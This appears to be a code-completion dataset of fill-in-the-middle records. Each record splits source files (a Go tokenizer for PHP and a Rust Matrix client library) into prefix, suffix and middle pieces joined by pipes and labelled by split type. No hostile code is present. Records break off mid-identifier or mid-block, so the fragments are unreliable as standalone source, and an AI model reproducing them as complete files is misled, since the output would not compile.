"namespace": Namespace,
"new": New,
"or": BooleanOr,
"print": Print,
"private": Private,
"protected": Protected,
"public": Public,
"require": Require,
"require_once": RequireOnce,
"return": Return,
"static": Static,
"switch": Switch,
"throw": Throw,
"trait": Trait,
"try": Try,
"unset": Unset,
"use": Use,
"var": Var,
"while": While,
}
var identifiers = map[string]Type{
"exit": Exit,
"die": Exit,
"function": Function,
"const": Const,
"return": Return,
"yield": Yield,
"try": Try,
"catch": Catch,
"finally": Finally,
"throw": Throw,
"if": If,
"elseif": Elseif,
"endif": Endif,
"else": Else,
"while": While,
"endwhile": Endwhile,
"do": Do,
"for": For,
"endfor": Endfor,
"foreach": Foreach,
"endforeach": Endforeach,
"declare": Enddeclare,
"instanceof": Instanceof,
"as": As,
"switch": Switch,
"endswitch": Endswitch,
"case": Case,
"default": Default,
"break": Break,
"continue": Continue,
"goto": Goto,
"echo": Echo,
"print": Print,
"class": Class,
"interface": Interface,
"trait": Trait,
"extends": Extends,
"implements": Implements,
"new": New,
"clone": Clone,
"var": Var,
"eval": Eval,
"include": Include,
"include_once": IncludeOnce,
"require": Require,
"require_once": RequireOnce,
"namespace": Namespace,
"use": Use,
"insteadof": Insteadof,
"global": Global,
"isset": Isset,
"empty": Empty,
"__halt_compiler": HaltCompiler,
"static": Static,
"abstract": Abstract,
"final": Final,
"private": Private,
"protected": Protected,
"public": Public,
"unset": Unset,
"list": List,
"array": Array,
"callable": Callable,
"__class__": ClassC,
"__trait__": TraitC,
"__function__": FuncC,
"__method__": MethodC,
"__line__": Line,
"__file__": File,
"__dir__": Dir,
"__namespace__": NsC,
"or": LogicalOr,
"and": LogicalAnd,
"xor": LogicalXor,
}
func LookupIdent(ident string) Type {
if t, ok := identifiers[strings.ToLower(ident)]; ok {
return t
}
return String
}
func NewToken(t Type, literal string, line int) Token {
return Token{Type: t, Literal: literal, Line: line}
} | EncapsedAndWhitespace | random_line_split |
token.go | package token
import "strings"
type Type int
const (
End Type = iota
Include
IncludeOnce
Eval
Require
RequireOnce
LogicalOr
LogicalXor
LogicalAnd
Print
Yield
DoubleArrow
YieldFrom
PlusEqual
MinusEqual
MulEqual
DivEqual
ConcatEqual
ModEqual
AndEqual
OrEqual
XorEqual
SlEqual
SrEqual
PowEqual
Coalesce
BooleanOr
BooleanAnd
IsEqual
IsNotEqual
IsIdentical
IsNotIdentical
Spaceship
IsSmallerOrEqual
IsGreaterOrEqual
Sl
Sr
Instanceof
Inc
Dec
IntCast
DoubleCast
StringCast
ArrayCast
ObjectCast
BoolCast
UnsetCast
Pow
New
Clone
Noelse
Elseif
Else
Endif
Static
Abstract
Final
Private
Protected
Public
Lnumber
Dnumber
String
Variable
InlineHtml
EncapsedAndWhitespace
ConstantEncapsedString
StringVarname
NumString
Exit
If
Echo
Do
While
Endwhile
For
Endfor
Foreach
Endforeach
Declare
Enddeclare
As
Switch
Endswitch
Case
Default
Break
Continue
Goto
Function
Const
Return
Try
Catch
Finally
Throw
Use
Insteadof
Global
Var
Unset
Isset
Empty
HaltCompiler
Class
Trait
Interface
Extends
Implements
ObjectOperator
List
Array
Callable
Line
File
Dir
ClassC
TraitC
MethodC
FuncC
Comment
DocComment
OpenTag
OpenTagWithEcho
CloseTag
Whitespace
StartHeredoc
EndHeredoc
DollarOpenCurlyBraces
CurlyOpen
PaamayimNekudotayim
Namespace
NsC
NsSeparator
Ellipsis
Error
// Single character
Semicolon // ';'
Colon // ':'
Comma // ','
Dot // '.'
LBracket // '['
RBracket // ']'
LParen // '('
RParen // ')'
Bar // '|'
Caret // '^'
Ampersand // '&'
Plus // '+'
Minus // '-'
Asterisk // '*'
Slash // '/'
Assign // '='
Modulo // '%'
Bang // '!'
Tilde // '~'
Dollar // '$'
Lt // '<'
Gt // '>'
QuestionMark // '?'
At // '@'
DoubleQuotes // '"'
LBrace // '{'
RBrace // '}'
Backquote // '`'
)
type Token struct {
Line int
Type Type
Literal string
}
var tokenName = map[Type]string{
End: "End",
Include: "Include",
IncludeOnce: "IncludeOnce",
Eval: "Eval",
Require: "Require",
RequireOnce: "RequireOnce",
LogicalOr: "LogicalOr",
LogicalXor: "LogicalXor",
LogicalAnd: "LogicalAnd",
Print: "Print",
Yield: "Yield",
DoubleArrow: "DoubleArrow",
YieldFrom: "YieldFrom",
PlusEqual: "PlusEqual",
MinusEqual: "MinusEqual",
MulEqual: "MulEqual",
DivEqual: "DivEqual",
ConcatEqual: "ConcatEqual",
ModEqual: "ModEqual",
AndEqual: "AndEqual",
OrEqual: "OrEqual",
XorEqual: "XorEqual",
SlEqual: "SlEqual",
SrEqual: "SrEqual",
PowEqual: "PowEqual",
Coalesce: "Coalesce",
BooleanOr: "BooleanOr",
BooleanAnd: "BooleanAnd",
IsEqual: "IsEqual",
IsNotEqual: "IsNotEqual",
IsIdentical: "IsIdentical",
IsNotIdentical: "IsNotIdentical",
Spaceship: "Spaceship",
IsSmallerOrEqual: "IsSmallerOrEqual",
IsGreaterOrEqual: "IsGreaterOrEqual",
Sl: "Sl",
Sr: "Sr",
Instanceof: "Instanceof",
Inc: "Inc",
Dec: "Dec",
IntCast: "IntCast",
DoubleCast: "DoubleCast",
StringCast: "StringCast",
ArrayCast: "ArrayCast",
ObjectCast: "ObjectCast",
BoolCast: "BoolCast",
UnsetCast: "UnsetCast",
Pow: "Pow",
New: "New",
Clone: "Clone",
Noelse: "Noelse",
Elseif: "Elseif",
Else: "Else",
Endif: "Endif",
Static: "Static",
Abstract: "Abstract",
Final: "Final",
Private: "Private",
Protected: "Protected",
Public: "Public",
Lnumber: "Lnumber",
Dnumber: "Dnumber",
String: "String",
Variable: "Variable",
InlineHtml: "InlineHtml",
EncapsedAndWhitespace: "EncapsedAndWhitespace",
ConstantEncapsedString: "ConstantEncapsedString",
StringVarname: "StringVarname",
NumString: "NumString",
Exit: "Exit",
If: "If",
Echo: "Echo",
Do: "Do",
While: "While",
Endwhile: "Endwhile",
For: "For",
Endfor: "Endfor",
Foreach: "Foreach",
Endforeach: "Endforeach",
Declare: "Declare",
Enddeclare: "Enddeclare",
As: "As",
Switch: "Switch",
Endswitch: "Endswitch",
Case: "Case",
Default: "Default",
Break: "Break",
Continue: "Continue",
Goto: "Goto",
Function: "Function",
Const: "Const",
Return: "Return",
Try: "Try",
Catch: "Catch",
Finally: "Finally",
Throw: "Throw",
Use: "Use",
Insteadof: "Insteadof",
Global: "Global",
Var: "Var",
Unset: "Unset",
Isset: "Isset",
Empty: "Empty",
HaltCompiler: "HaltCompiler",
Class: "Class",
Trait: "Trait",
Interface: "Interface",
Extends: "Extends",
Implements: "Implements",
ObjectOperator: "ObjectOperator",
List: "List",
Array: "Array",
Callable: "Callable",
Line: "__LINE__",
File: "__FILE__",
Dir: "__DIR__",
ClassC: "__CLASS__",
TraitC: "__TRAIT__",
MethodC: "__METHOD__",
FuncC: "__FUNCTION__",
Comment: "Comment",
DocComment: "DocComment",
OpenTag: "OpenTag",
OpenTagWithEcho: "OpenTagWithEcho",
CloseTag: "CloseTag",
Whitespace: "Whitespace",
StartHeredoc: "StartHeredoc",
EndHeredoc: "EndHeredoc",
DollarOpenCurlyBraces: "DollarOpenCurlyBraces",
CurlyOpen: "CurlyOpen",
PaamayimNekudotayim: "PaamayimNekudotayim",
Namespace: "Namespace",
NsC: "__NAMESPACE__",
NsSeparator: "NsSeparator",
Ellipsis: "Ellipsis",
Error: "Error",
// Single character
Semicolon: "Semicolon",
Colon: "Colon",
Comma: "Comma",
Dot: "Dot",
LBracket: "LBracket",
RBracket: "RBracket",
LParen: "LParen",
RParen: "RParen",
Bar: "Bar",
Caret: "Caret",
Ampersand: "Ampersand",
Plus: "Plus",
Minus: "Minus",
Asterisk: "Asterisk",
Slash: "Slash",
Assign: "Assign",
Modulo: "Modulo",
Bang: "Bang",
Tilde: "Tilde",
Dollar: "Dollar",
Lt: "Lt",
Gt: "Gt",
QuestionMark: "QuestionMark",
At: "At",
DoubleQuotes: "DoubleQuotes",
LBrace: "LBrace",
RBrace: "RBrace",
Backquote: "Backquote",
}
func (t Type) String() string {
if n, ok := tokenName[t]; ok {
return n
}
return "Unknown"
}
var keywords = map[string]Type{
"abstract": Abstract,
"and": BooleanAnd,
"array": Array,
"as": As,
"break": Break,
"callable": Callable,
"case": Case,
"catch": Catch,
"class": Class,
"clone": Clone,
"const": Const,
"continue": Continue,
"declare": Declare,
"default": Default,
"die": Exit,
"do": Do,
"echo": Echo,
"else": Else,
"elseif": Elseif,
"empty": Empty,
"enddeclare": Enddeclare,
"endfor": Endfor,
"endforeach": Endforeach,
"endif": Endif,
"endswitch": Endswitch,
"endwhile": Endwhile,
"eval": Eval,
"exit": Exit,
"extends": Extends,
"final": Final,
"finally": Finally,
"for": For,
"foreach": Foreach,
"function": Function,
"global": Global,
"goto": Goto,
"if": If,
"implements": Implements,
"include": Include,
"include_once": IncludeOnce,
"instanceof": Instanceof,
"insteadof": Insteadof,
"interface": Interface,
"isset": Isset,
"list": List,
"namespace": Namespace,
"new": New,
"or": BooleanOr,
"print": Print,
"private": Private,
"protected": Protected,
"public": Public,
"require": Require,
"require_once": RequireOnce,
"return": Return,
"static": Static,
"switch": Switch,
"throw": Throw,
"trait": Trait,
"try": Try,
"unset": Unset,
"use": Use,
"var": Var,
"while": While,
}
var identifiers = map[string]Type{
"exit": Exit,
"die": Exit,
"function": Function,
"const": Const,
"return": Return,
"yield": Yield,
"try": Try,
"catch": Catch,
"finally": Finally,
"throw": Throw,
"if": If,
"elseif": Elseif,
"endif": Endif,
"else": Else,
"while": While,
"endwhile": Endwhile,
"do": Do,
"for": For,
"endfor": Endfor,
"foreach": Foreach,
"endforeach": Endforeach,
"declare": Enddeclare,
"instanceof": Instanceof,
"as": As,
"switch": Switch,
"endswitch": Endswitch,
"case": Case,
"default": Default,
"break": Break,
"continue": Continue,
"goto": Goto,
"echo": Echo,
"print": Print,
"class": Class,
"interface": Interface,
"trait": Trait,
"extends": Extends,
"implements": Implements,
"new": New,
"clone": Clone,
"var": Var,
"eval": Eval,
"include": Include,
"include_once": IncludeOnce,
"require": Require,
"require_once": RequireOnce,
"namespace": Namespace,
"use": Use,
"insteadof": Insteadof,
"global": Global,
"isset": Isset,
"empty": Empty,
"__halt_compiler": HaltCompiler,
"static": Static,
"abstract": Abstract,
"final": Final,
"private": Private,
"protected": Protected,
"public": Public,
"unset": Unset,
"list": List,
"array": Array,
"callable": Callable,
"__class__": ClassC,
"__trait__": TraitC,
"__function__": FuncC,
"__method__": MethodC,
"__line__": Line,
"__file__": File,
"__dir__": Dir,
"__namespace__": NsC,
"or": LogicalOr,
"and": LogicalAnd,
"xor": LogicalXor,
}
func LookupIdent(ident string) Type {
if t, ok := identifiers[strings.ToLower(ident)]; ok |
return String
}
func NewToken(t Type, literal string, line int) Token {
return Token{Type: t, Literal: literal, Line: line}
}
| {
return t
} | conditional_block |
token.go | package token
import "strings"
type Type int
const (
End Type = iota
Include
IncludeOnce
Eval
Require
RequireOnce
LogicalOr
LogicalXor
LogicalAnd
Print
Yield
DoubleArrow
YieldFrom
PlusEqual
MinusEqual
MulEqual
DivEqual
ConcatEqual
ModEqual
AndEqual
OrEqual
XorEqual
SlEqual
SrEqual
PowEqual
Coalesce
BooleanOr
BooleanAnd
IsEqual
IsNotEqual
IsIdentical
IsNotIdentical
Spaceship
IsSmallerOrEqual
IsGreaterOrEqual
Sl
Sr
Instanceof
Inc
Dec
IntCast
DoubleCast
StringCast
ArrayCast
ObjectCast
BoolCast
UnsetCast
Pow
New
Clone
Noelse
Elseif
Else
Endif
Static
Abstract
Final
Private
Protected
Public
Lnumber
Dnumber
String
Variable
InlineHtml
EncapsedAndWhitespace
ConstantEncapsedString
StringVarname
NumString
Exit
If
Echo
Do
While
Endwhile
For
Endfor
Foreach
Endforeach
Declare
Enddeclare
As
Switch
Endswitch
Case
Default
Break
Continue
Goto
Function
Const
Return
Try
Catch
Finally
Throw
Use
Insteadof
Global
Var
Unset
Isset
Empty
HaltCompiler
Class
Trait
Interface
Extends
Implements
ObjectOperator
List
Array
Callable
Line
File
Dir
ClassC
TraitC
MethodC
FuncC
Comment
DocComment
OpenTag
OpenTagWithEcho
CloseTag
Whitespace
StartHeredoc
EndHeredoc
DollarOpenCurlyBraces
CurlyOpen
PaamayimNekudotayim
Namespace
NsC
NsSeparator
Ellipsis
Error
// Single character
Semicolon // ';'
Colon // ':'
Comma // ','
Dot // '.'
LBracket // '['
RBracket // ']'
LParen // '('
RParen // ')'
Bar // '|'
Caret // '^'
Ampersand // '&'
Plus // '+'
Minus // '-'
Asterisk // '*'
Slash // '/'
Assign // '='
Modulo // '%'
Bang // '!'
Tilde // '~'
Dollar // '$'
Lt // '<'
Gt // '>'
QuestionMark // '?'
At // '@'
DoubleQuotes // '"'
LBrace // '{'
RBrace // '}'
Backquote // '`'
)
type Token struct {
Line int
Type Type
Literal string
}
var tokenName = map[Type]string{
End: "End",
Include: "Include",
IncludeOnce: "IncludeOnce",
Eval: "Eval",
Require: "Require",
RequireOnce: "RequireOnce",
LogicalOr: "LogicalOr",
LogicalXor: "LogicalXor",
LogicalAnd: "LogicalAnd",
Print: "Print",
Yield: "Yield",
DoubleArrow: "DoubleArrow",
YieldFrom: "YieldFrom",
PlusEqual: "PlusEqual",
MinusEqual: "MinusEqual",
MulEqual: "MulEqual",
DivEqual: "DivEqual",
ConcatEqual: "ConcatEqual",
ModEqual: "ModEqual",
AndEqual: "AndEqual",
OrEqual: "OrEqual",
XorEqual: "XorEqual",
SlEqual: "SlEqual",
SrEqual: "SrEqual",
PowEqual: "PowEqual",
Coalesce: "Coalesce",
BooleanOr: "BooleanOr",
BooleanAnd: "BooleanAnd",
IsEqual: "IsEqual",
IsNotEqual: "IsNotEqual",
IsIdentical: "IsIdentical",
IsNotIdentical: "IsNotIdentical",
Spaceship: "Spaceship",
IsSmallerOrEqual: "IsSmallerOrEqual",
IsGreaterOrEqual: "IsGreaterOrEqual",
Sl: "Sl",
Sr: "Sr",
Instanceof: "Instanceof",
Inc: "Inc",
Dec: "Dec",
IntCast: "IntCast",
DoubleCast: "DoubleCast",
StringCast: "StringCast",
ArrayCast: "ArrayCast",
ObjectCast: "ObjectCast",
BoolCast: "BoolCast",
UnsetCast: "UnsetCast",
Pow: "Pow",
New: "New",
Clone: "Clone",
Noelse: "Noelse",
Elseif: "Elseif",
Else: "Else",
Endif: "Endif",
Static: "Static",
Abstract: "Abstract",
Final: "Final",
Private: "Private",
Protected: "Protected",
Public: "Public",
Lnumber: "Lnumber",
Dnumber: "Dnumber",
String: "String",
Variable: "Variable",
InlineHtml: "InlineHtml",
EncapsedAndWhitespace: "EncapsedAndWhitespace",
ConstantEncapsedString: "ConstantEncapsedString",
StringVarname: "StringVarname",
NumString: "NumString",
Exit: "Exit",
If: "If",
Echo: "Echo",
Do: "Do",
While: "While",
Endwhile: "Endwhile",
For: "For",
Endfor: "Endfor",
Foreach: "Foreach",
Endforeach: "Endforeach",
Declare: "Declare",
Enddeclare: "Enddeclare",
As: "As",
Switch: "Switch",
Endswitch: "Endswitch",
Case: "Case",
Default: "Default",
Break: "Break",
Continue: "Continue",
Goto: "Goto",
Function: "Function",
Const: "Const",
Return: "Return",
Try: "Try",
Catch: "Catch",
Finally: "Finally",
Throw: "Throw",
Use: "Use",
Insteadof: "Insteadof",
Global: "Global",
Var: "Var",
Unset: "Unset",
Isset: "Isset",
Empty: "Empty",
HaltCompiler: "HaltCompiler",
Class: "Class",
Trait: "Trait",
Interface: "Interface",
Extends: "Extends",
Implements: "Implements",
ObjectOperator: "ObjectOperator",
List: "List",
Array: "Array",
Callable: "Callable",
Line: "__LINE__",
File: "__FILE__",
Dir: "__DIR__",
ClassC: "__CLASS__",
TraitC: "__TRAIT__",
MethodC: "__METHOD__",
FuncC: "__FUNCTION__",
Comment: "Comment",
DocComment: "DocComment",
OpenTag: "OpenTag",
OpenTagWithEcho: "OpenTagWithEcho",
CloseTag: "CloseTag",
Whitespace: "Whitespace",
StartHeredoc: "StartHeredoc",
EndHeredoc: "EndHeredoc",
DollarOpenCurlyBraces: "DollarOpenCurlyBraces",
CurlyOpen: "CurlyOpen",
PaamayimNekudotayim: "PaamayimNekudotayim",
Namespace: "Namespace",
NsC: "__NAMESPACE__",
NsSeparator: "NsSeparator",
Ellipsis: "Ellipsis",
Error: "Error",
// Single character
Semicolon: "Semicolon",
Colon: "Colon",
Comma: "Comma",
Dot: "Dot",
LBracket: "LBracket",
RBracket: "RBracket",
LParen: "LParen",
RParen: "RParen",
Bar: "Bar",
Caret: "Caret",
Ampersand: "Ampersand",
Plus: "Plus",
Minus: "Minus",
Asterisk: "Asterisk",
Slash: "Slash",
Assign: "Assign",
Modulo: "Modulo",
Bang: "Bang",
Tilde: "Tilde",
Dollar: "Dollar",
Lt: "Lt",
Gt: "Gt",
QuestionMark: "QuestionMark",
At: "At",
DoubleQuotes: "DoubleQuotes",
LBrace: "LBrace",
RBrace: "RBrace",
Backquote: "Backquote",
}
func (t Type) | () string {
if n, ok := tokenName[t]; ok {
return n
}
return "Unknown"
}
var keywords = map[string]Type{
"abstract": Abstract,
"and": BooleanAnd,
"array": Array,
"as": As,
"break": Break,
"callable": Callable,
"case": Case,
"catch": Catch,
"class": Class,
"clone": Clone,
"const": Const,
"continue": Continue,
"declare": Declare,
"default": Default,
"die": Exit,
"do": Do,
"echo": Echo,
"else": Else,
"elseif": Elseif,
"empty": Empty,
"enddeclare": Enddeclare,
"endfor": Endfor,
"endforeach": Endforeach,
"endif": Endif,
"endswitch": Endswitch,
"endwhile": Endwhile,
"eval": Eval,
"exit": Exit,
"extends": Extends,
"final": Final,
"finally": Finally,
"for": For,
"foreach": Foreach,
"function": Function,
"global": Global,
"goto": Goto,
"if": If,
"implements": Implements,
"include": Include,
"include_once": IncludeOnce,
"instanceof": Instanceof,
"insteadof": Insteadof,
"interface": Interface,
"isset": Isset,
"list": List,
"namespace": Namespace,
"new": New,
"or": BooleanOr,
"print": Print,
"private": Private,
"protected": Protected,
"public": Public,
"require": Require,
"require_once": RequireOnce,
"return": Return,
"static": Static,
"switch": Switch,
"throw": Throw,
"trait": Trait,
"try": Try,
"unset": Unset,
"use": Use,
"var": Var,
"while": While,
}
var identifiers = map[string]Type{
"exit": Exit,
"die": Exit,
"function": Function,
"const": Const,
"return": Return,
"yield": Yield,
"try": Try,
"catch": Catch,
"finally": Finally,
"throw": Throw,
"if": If,
"elseif": Elseif,
"endif": Endif,
"else": Else,
"while": While,
"endwhile": Endwhile,
"do": Do,
"for": For,
"endfor": Endfor,
"foreach": Foreach,
"endforeach": Endforeach,
"declare": Enddeclare,
"instanceof": Instanceof,
"as": As,
"switch": Switch,
"endswitch": Endswitch,
"case": Case,
"default": Default,
"break": Break,
"continue": Continue,
"goto": Goto,
"echo": Echo,
"print": Print,
"class": Class,
"interface": Interface,
"trait": Trait,
"extends": Extends,
"implements": Implements,
"new": New,
"clone": Clone,
"var": Var,
"eval": Eval,
"include": Include,
"include_once": IncludeOnce,
"require": Require,
"require_once": RequireOnce,
"namespace": Namespace,
"use": Use,
"insteadof": Insteadof,
"global": Global,
"isset": Isset,
"empty": Empty,
"__halt_compiler": HaltCompiler,
"static": Static,
"abstract": Abstract,
"final": Final,
"private": Private,
"protected": Protected,
"public": Public,
"unset": Unset,
"list": List,
"array": Array,
"callable": Callable,
"__class__": ClassC,
"__trait__": TraitC,
"__function__": FuncC,
"__method__": MethodC,
"__line__": Line,
"__file__": File,
"__dir__": Dir,
"__namespace__": NsC,
"or": LogicalOr,
"and": LogicalAnd,
"xor": LogicalXor,
}
func LookupIdent(ident string) Type {
if t, ok := identifiers[strings.ToLower(ident)]; ok {
return t
}
return String
}
func NewToken(t Type, literal string, line int) Token {
return Token{Type: t, Literal: literal, Line: line}
}
| String | identifier_name |
lib.rs | //! Crate `ruma_client` is a [Matrix](https://matrix.org/) client library.
//!
//! # Usage
//!
//! Begin by creating a `Client` type, usually using the `https` method for a client that supports
//! secure connections, and then logging in:
//!
//! ```no_run
//! use futures::Future;
//! use ruma_client::Client;
//!
//! let homeserver_url = "https://example.com".parse().unwrap();
//! let client = Client::https(homeserver_url, None).unwrap();
//!
//! let work = client
//! .log_in("@alice:example.com".to_string(), "secret".to_string(), None)
//! .and_then(|session| {
//! // You're now logged in! Write the session to a file if you want to restore it later.
//! // Then start using the API!
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! You can also pass an existing session to the `Client` constructor to restore a previous session
//! rather than calling `log_in`.
//!
//! For the standard use case of synchronizing with the homeserver (i.e. getting all the latest
//! events), use the `Client::sync`:
//!
//! ```no_run
//! # use futures::{Future, Stream};
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! let work = client.sync(None, None, true).map(|response| {
//! // Do something with the data in the response...
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! The `Client` type also provides methods for registering a new account if you don't already have
//! one with the given homeserver.
//!
//! Beyond these basic convenience methods, `ruma-client` gives you access to the entire Matrix
//! client-server API via the `api` module. Each leaf module under this tree of modules contains
//! the necessary types for one API endpoint. Simply call the module's `call` method, passing it
//! the logged in `Client` and the relevant `Request` type. `call` will return a future that will
//! resolve to the relevant `Response` type.
//!
//! For example:
//!
//! ```no_run
//! # use futures::Future;
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! use std::convert::TryFrom;
//!
//! use ruma_client::api::r0::alias::get_alias;
//! use ruma_identifiers::{RoomAliasId, RoomId};
//!
//! let request = get_alias::Request {
//! room_alias: RoomAliasId::try_from("#example_room:example.com").unwrap(),
//! };
//!
//! let work = get_alias::call(client, request).and_then(|response| {
//! assert_eq!(response.room_id, RoomId::try_from("!n8f893n9:example.com").unwrap());
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
#![deny(
missing_copy_implementations,
missing_debug_implementations,
missing_docs,
warnings
)]
#![warn(
clippy::empty_line_after_outer_attr,
clippy::expl_impl_clone_on_copy,
clippy::if_not_else,
clippy::items_after_statements,
clippy::match_same_arms,
clippy::mem_forget,
clippy::missing_docs_in_private_items,
clippy::mut_mut,
clippy::needless_borrow,
clippy::needless_continue,
clippy::single_match_else,
clippy::unicode_not_nfc,
clippy::use_self,
clippy::used_underscore_binding,
clippy::wrong_pub_self_convention,
clippy::wrong_self_convention
)]
use std::{
convert::TryInto,
str::FromStr,
sync::{Arc, Mutex},
};
use futures::{
future::{Future, FutureFrom, IntoFuture},
stream::{self, Stream},
};
use hyper::{
client::{connect::Connect, HttpConnector},
Client as HyperClient, Uri,
};
#[cfg(feature = "hyper-tls")]
use hyper_tls::HttpsConnector;
#[cfg(feature = "hyper-tls")]
use native_tls::Error as NativeTlsError;
use ruma_api::Endpoint;
use url::Url;
use crate::error::InnerError;
pub use crate::{error::Error, session::Session};
/// Matrix client-server API endpoints.
pub mod api;
mod error;
mod session;
/// A client for the Matrix client-server API.
#[derive(Debug)]
pub struct Client<C: Connect>(Arc<ClientData<C>>);
/// Data contained in Client's Rc
#[derive(Debug)]
struct ClientData<C>
where
C: Connect,
{
/// The URL of the homeserver to connect to.
homeserver_url: Url,
/// The underlying HTTP client.
hyper: HyperClient<C>,
/// User session data.
session: Mutex<Option<Session>>,
}
impl Client<HttpConnector> {
/// Creates a new client for making HTTP requests to the given homeserver.
pub fn new(homeserver_url: Url, session: Option<Session>) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: HyperClient::builder().keep_alive(true).build_http(),
session: Mutex::new(session),
}))
}
/// Get a copy of the current `Session`, if any.
///
/// Useful for serializing and persisting the session to be restored later.
pub fn session(&self) -> Option<Session> |
}
#[cfg(feature = "tls")]
impl Client<HttpsConnector<HttpConnector>> {
/// Creates a new client for making HTTPS requests to the given homeserver.
pub fn https(homeserver_url: Url, session: Option<Session>) -> Result<Self, NativeTlsError> {
let connector = HttpsConnector::new(4)?;
Ok(Self(Arc::new(ClientData {
homeserver_url,
hyper: { HyperClient::builder().keep_alive(true).build(connector) },
session: Mutex::new(session),
})))
}
}
impl<C> Client<C>
where
C: Connect + 'static,
{
/// Creates a new client using the given `hyper::Client`.
///
/// This allows the user to configure the details of HTTP as desired.
pub fn custom(
hyper_client: HyperClient<C>,
homeserver_url: Url,
session: Option<Session>,
) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: hyper_client,
session: Mutex::new(session),
}))
}
/// Log in with a username and password.
///
/// In contrast to api::r0::session::login::call(), this method stores the
/// session data returned by the endpoint in this client, instead of
/// returning it.
pub fn log_in(
&self,
user: String,
password: String,
device_id: Option<String>,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::session::login;
let data = self.0.clone();
login::call(
self.clone(),
login::Request {
address: None,
login_type: login::LoginType::Password,
medium: None,
device_id,
password,
user,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a guest. In contrast to api::r0::account::register::call(),
/// this method stores the session data returned by the endpoint in this
/// client, instead of returning it.
pub fn register_guest(&self) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::Guest),
password: None,
username: None,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a new user on this server.
///
/// In contrast to api::r0::account::register::call(), this method stores
/// the session data returned by the endpoint in this client, instead of
/// returning it.
///
/// The username is the local part of the returned user_id. If it is
/// omitted from this request, the server will generate one.
pub fn register_user(
&self,
username: Option<String>,
password: String,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::User),
password: Some(password),
username,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Convenience method that represents repeated calls to the sync_events endpoint as a stream.
///
/// If the since parameter is None, the first Item might take a significant time to arrive and
/// be deserialized, because it contains all events that have occured in the whole lifetime of
/// the logged-in users account and are visible to them.
pub fn sync(
&self,
filter: Option<api::r0::sync::sync_events::Filter>,
since: Option<String>,
set_presence: bool,
) -> impl Stream<Item = api::r0::sync::sync_events::Response, Error = Error> {
use crate::api::r0::sync::sync_events;
let client = self.clone();
let set_presence = if set_presence {
None
} else {
Some(sync_events::SetPresence::Offline)
};
stream::unfold(since, move |since| {
Some(
sync_events::call(
client.clone(),
sync_events::Request {
filter: filter.clone(),
since,
full_state: None,
set_presence: set_presence.clone(),
timeout: None,
},
)
.map(|res| {
let next_batch_clone = res.next_batch.clone();
(res, Some(next_batch_clone))
}),
)
})
}
/// Makes a request to a Matrix API endpoint.
pub(crate) fn request<E>(
self,
request: <E as Endpoint>::Request,
) -> impl Future<Item = E::Response, Error = Error>
where
E: Endpoint,
{
let data1 = self.0.clone();
let data2 = self.0.clone();
let mut url = self.0.homeserver_url.clone();
request
.try_into()
.map_err(Error::from)
.into_future()
.and_then(move |hyper_request| {
{
let uri = hyper_request.uri();
url.set_path(uri.path());
url.set_query(uri.query());
if E::METADATA.requires_authentication {
if let Some(ref session) = *data1.session.lock().unwrap() {
url.query_pairs_mut()
.append_pair("access_token", &session.access_token);
} else {
return Err(Error(InnerError::AuthenticationRequired));
}
}
}
Uri::from_str(url.as_ref())
.map(move |uri| (uri, hyper_request))
.map_err(Error::from)
})
.and_then(move |(uri, mut hyper_request)| {
*hyper_request.uri_mut() = uri;
data2.hyper.request(hyper_request).map_err(Error::from)
})
.and_then(|hyper_response| {
E::Response::future_from(hyper_response).map_err(Error::from)
})
}
}
impl<C: Connect> Clone for Client<C> {
fn clone(&self) -> Self {
Self(self.0.clone())
}
}
| {
self.0
.session
.lock()
.expect("session mutex was poisoned")
.clone()
} | identifier_body |
lib.rs | //! Crate `ruma_client` is a [Matrix](https://matrix.org/) client library.
//!
//! # Usage
//!
//! Begin by creating a `Client` type, usually using the `https` method for a client that supports
//! secure connections, and then logging in:
//!
//! ```no_run
//! use futures::Future;
//! use ruma_client::Client;
//!
//! let homeserver_url = "https://example.com".parse().unwrap();
//! let client = Client::https(homeserver_url, None).unwrap();
//!
//! let work = client
//! .log_in("@alice:example.com".to_string(), "secret".to_string(), None)
//! .and_then(|session| {
//! // You're now logged in! Write the session to a file if you want to restore it later.
//! // Then start using the API!
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! You can also pass an existing session to the `Client` constructor to restore a previous session
//! rather than calling `log_in`.
//!
//! For the standard use case of synchronizing with the homeserver (i.e. getting all the latest
//! events), use the `Client::sync`:
//!
//! ```no_run
//! # use futures::{Future, Stream};
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! let work = client.sync(None, None, true).map(|response| {
//! // Do something with the data in the response...
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! The `Client` type also provides methods for registering a new account if you don't already have
//! one with the given homeserver.
//!
